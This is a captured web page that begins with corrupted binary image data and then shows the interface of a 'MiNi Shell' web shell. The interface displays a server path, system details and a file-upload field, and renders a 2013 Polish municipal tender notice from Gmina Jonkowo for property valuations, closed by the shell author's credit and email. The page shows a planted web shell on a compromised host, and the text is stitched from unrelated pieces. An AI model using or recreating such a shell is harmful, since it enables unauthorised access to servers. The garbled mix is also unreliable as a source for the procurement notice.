JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130205/48732-N-2013.html

<p class="kh_header"><b>Jonkowo: Sporządzanie wycen nieruchomości w formie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 48732 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jonkowo , ul. Klonowa 2, 11-042 Jonkowo, woj. warmińsko-mazurskie, tel. 0-89 512 92 32, faks 0-89 512 92 37, 512 92 32.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzanie wycen nieruchomości w formie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywne sporządzanie wycen nieruchomości w formie operatów szacunkowych dla potrzeb Gminy Jonkowo. 
2.	W zakres zamówienia wchodzi sporządzanie operatów szacunkowych w celu:
-  naliczenia opłaty adiacenckiej z tytułu wzrostu wartości nieruchomości na skutek jej podziału do 10 działek (włącznie) po podziale - 6 operatów,
-  naliczenia opłaty adiacenckiej z tytułu wzrostu wartości nieruchomości na skutek jej podziału powyżej 10 działek po podziale - 2 operaty (łącznie 42 działki),
-  naliczenia opłaty adiacenckiej z tytułu wzrostu wartości nieruchomości na skutek umożliwienia przyłączenia nieruchomości do sieci infrastruktury technicznej - 200 operatów,
-  naliczenia opłaty planistycznej od sprzedanej nieruchomości - 17 operatów,
-  ustalenia opłaty z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności - 4 operaty,
-  określenia wartości rynkowej nieruchomości zabudowanej przeznaczonej do sprzedaży - 3 operaty,
-  określenia wartości rynkowej nieruchomości niezabudowanej przeznaczonej do sprzedaży lub planowanej do nabycia - 10 operatów,
-  określenie wartości rynkowej pojedynczego lokalu mieszkalnego w budynku wielomieszkaniowym wraz  z ustaleniem wartości udziału w gruncie - 2 operaty.
3.	Przewidywane w ust. 2 ilości operatów szacunkowych stanowiących przedmiot niniejszego zamówienia są ilościami prognozowanymi określonymi dla potrzeb przeprowadzenia niniejszego postępowania i nie mogą stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, co do ilości faktycznie zamówionych przez Zamawiającego usług w toku realizacji umowy. 
4.	Wykonawca zobowiązany będzie do:
1)	wykonania przedmiotu zlecenia zgodnie z obowiązującymi przepisami, w terminie nie dłuższym niż 30 dni od dnia otrzymania zlecenia.
2)	dokonania ewentualnych poprawek, uzupełnień i wyjaśnień, w terminie 14 dni od dnia otrzymania wezwania do poprawienia, uzupełnienia lub wyjaśnienia,
3)	wypowiedzenia się w kwestii zarzutów do operatu szacunkowego zgłoszonych przez którąkolwiek ze stron postępowania administracyjnego, w terminie 14 dni od dnia otrzymania wezwania.
4)	wypowiedzenia się w kwestii uwag do operatu szacunkowego zgłoszonych w trakcie postępowania prowadzonego przez organ odwoławczy, w terminie 7 dni od dnia otrzymania wezwania,
5)	poprawienia operatu, w ramach otrzymanego wynagrodzenia za dane zlecenie, którego prawidłowość wykonania została zakwestionowana przez organ odwoławczy lub sąd administracyjny w terminie 14 dni licząc od dnia otrzymania pisemnego żądania Zamawiającego w tym zakresie.
5.	Wykonywanie usług będzie się odbywać sukcesywnie na podstawie odrębnych zleceń, w których będzie określony szczegółowy zakres prac danego zlecenia. Zamawiający będzie udzielał zleceń w miarę pojawiających się potrzeb w danym zakresie, w ilościach uwzględniających techniczne możliwości Wykonawcy i umowne terminy wykonania prac.  Terminy określone w ust. 4, w uzasadnionych przypadkach i za zgodą stron umowy, będą mogły podlegać wydłużeniu lub skróceniu. 
6.	W trakcie realizacji zamówienia Zamawiający udostępni posiadane informacje niezbędne do wykonania wyceny nieruchomości tj. zapisy z miejscowych planów zagospodarowania przestrzennego lub studium, informacje o terenie i zabudowie oraz wypisy z ewidencji gruntów i budynków. 
7.	Wykonawca własnym kosztem i staraniem winien przeprowadzać wizje lokalne, pomiary oraz ponosić wszelkie inne koszty związane ze sporządzeniem operatu szacunkowego. 
8.	Wynagrodzenie Wykonawcy:
1)	Wartość umowy będzie stanowiła całkowita cena brutto wykonania zamówienia określona przez wybranego Wykonawcę, odpowiadająca maksymalnej wartości nominalnej zobowiązania Zamawiającego, której strony nie będą mogły przekroczyć w trakcie realizacji umowy.
2)	Wynagrodzenie za usługi będzie płatne po wykonaniu i odbiorze przedmiotu każdorazowego zlecenia.
3)	Do obliczenia wynagrodzenia zastosowane zostaną określone w ofercie wybranego Wykonawcy ceny jednostkowe netto za jeden operat danego rodzaju. Zaoferowane przez Wykonawcę ceny jednostkowe netto nie będą podlegały zmianie w czasie trwania umowy. 
4)	Rozliczenie następować będzie w formie bezgotówkowej, przelewem na wskazany rachunek Wykonawcy, po doręczeniu Zamawiającemu faktury. 
5)	Zamawiający wymaga od Wykonawcy minimum 21 - dniowego terminu płatności faktur.
6)	Zamawiający nie dopuszcza rozliczenia w walutach obcych.
7)     Zamawiający nie przewiduje możliwości udzielenia zaliczki na poczet wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.10.00-0, 70.33.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że do realizacji niniejszego zamówienia będzie dysponował osobami (co najmniej jedną osobą), posiadającymi uprawnienia zawodowe z zakresu szacowania nieruchomości uzyskane zgodnie z art. 191 ustawy  z dnia 27-08-1997 r. o gospodarce nieruchomościami /Dz. U. z 2010 r. Nr 102 poz. 651 ze zm./ lub inne odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, a ponadto posiadającymi doświadczenie zawodowe w pracy rzeczoznawcy przejawiające się wykonaniem co najmniej 20 operatów szacunkowych dla potrzeb ustalenia opłaty adiacenckiej z tytułu wzrostu wartości nieruchomości na skutek umożliwienia przyłączenia nieruchomości do sieci infrastruktury technicznej oraz wykonaniem co najmniej 10 operatów szacunkowych w celu naliczenia opłaty planistycznej, a w przypadku samodzielnego wykonywania usług - osobiście posiadać odpowiednie uprawnienia i doświadczenie zawodowe.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz informacje zawarte w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia złożonym na potwierdzenie spełniania warunku, o którym mowa w rozdz. IX SIWZ - zgodnie z formułą spełnia - nie spełnia. 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami, tj. osobami niezbędnymi do realizacji przedmiotowego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotowego zamówienia. Pisemne zobowiązanie powinno bezspornie i jednoznacznie wskazywać na zakres zobowiązania podmiotu trzeciego oraz jednoznacznie określać czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane i w jaki sposób Wykonawca będzie dysponował osobami zdolnymi do wykonania przedmiotowego zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać w szczególności: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć z ofertą dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2. W przypadku podpisania oferty przez inne osoby niż uprawnione zgodnie z formą reprezentacji określoną w dokumencie właściwym dla formy organizacyjnej Wykonawcy, należy złożyć pełnomocnictwo do podpisania oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
1)	zmiany osób wskazanych w złożonym przez Wykonawcę Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, zmiana może nastąpić w uzasadnionych przypadkach, na wniosek Wykonawcy, za uprzednią zgodą Zamawiającego akceptującą kandydata na to stanowisko - kandydat musi co najmniej spełniać wymagania określone w SIWZ i Ogłoszeniu o zamówieniu.
2)	określone w rozdz. II ust. 4 SIWZ terminy wykonania poszczególnych zleceń oraz innych świadczeń związanych z ich realizacją będą mogły podlegać wydłużeniu lub skróceniu, w uzasadnionych przypadkach,  za zgodą stron umowy, 
3)	zmiany danych adresowych dotyczących stron umowy - w razie zmiany ich siedziby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/jonkowo_gmina_wiejska/         zakładka: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo, (pok. 9 parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 11:00, miejsce: Sekretariat Urzędu Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo, (pok. 16 piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com